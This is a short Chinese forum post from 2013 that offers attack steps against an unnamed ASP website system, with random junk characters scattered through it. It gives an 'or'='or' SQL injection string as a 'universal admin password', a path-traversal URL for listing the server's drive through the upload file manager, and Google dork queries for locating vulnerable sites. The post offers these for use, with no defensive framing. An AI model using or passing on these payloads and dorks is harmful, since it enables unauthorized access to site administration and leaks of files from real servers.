后台万能密码 'or'='or'
" J- y J1 V( j$ {" ~" k& c9 g% ~, A8 c- E
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
: F' ?: ]% k9 V2 S# u9 P( _4 c7 U2 badmin/uploadfile.asp?currentFolder=/upfiles/../
3 l: u1 c! _- K$ o l; S) [: A
& Z, r0 U' \' o漏洞证明:
1 g- W8 H% L0 i( B% {0 J& a
% c2 A4 V1 M- I5 o谷歌:inurl:type.asp?id=1 新闻中心0 J; k1 }0 f1 w. x0 W4 v* z4 _
或者 :inurl:download_ok.asp?
; O, I" t! R" Z
" |( z6 W8 x3 N: P% ^5 I1 w |
发表于 2013-3-14 20:17:32
收藏
支持
反对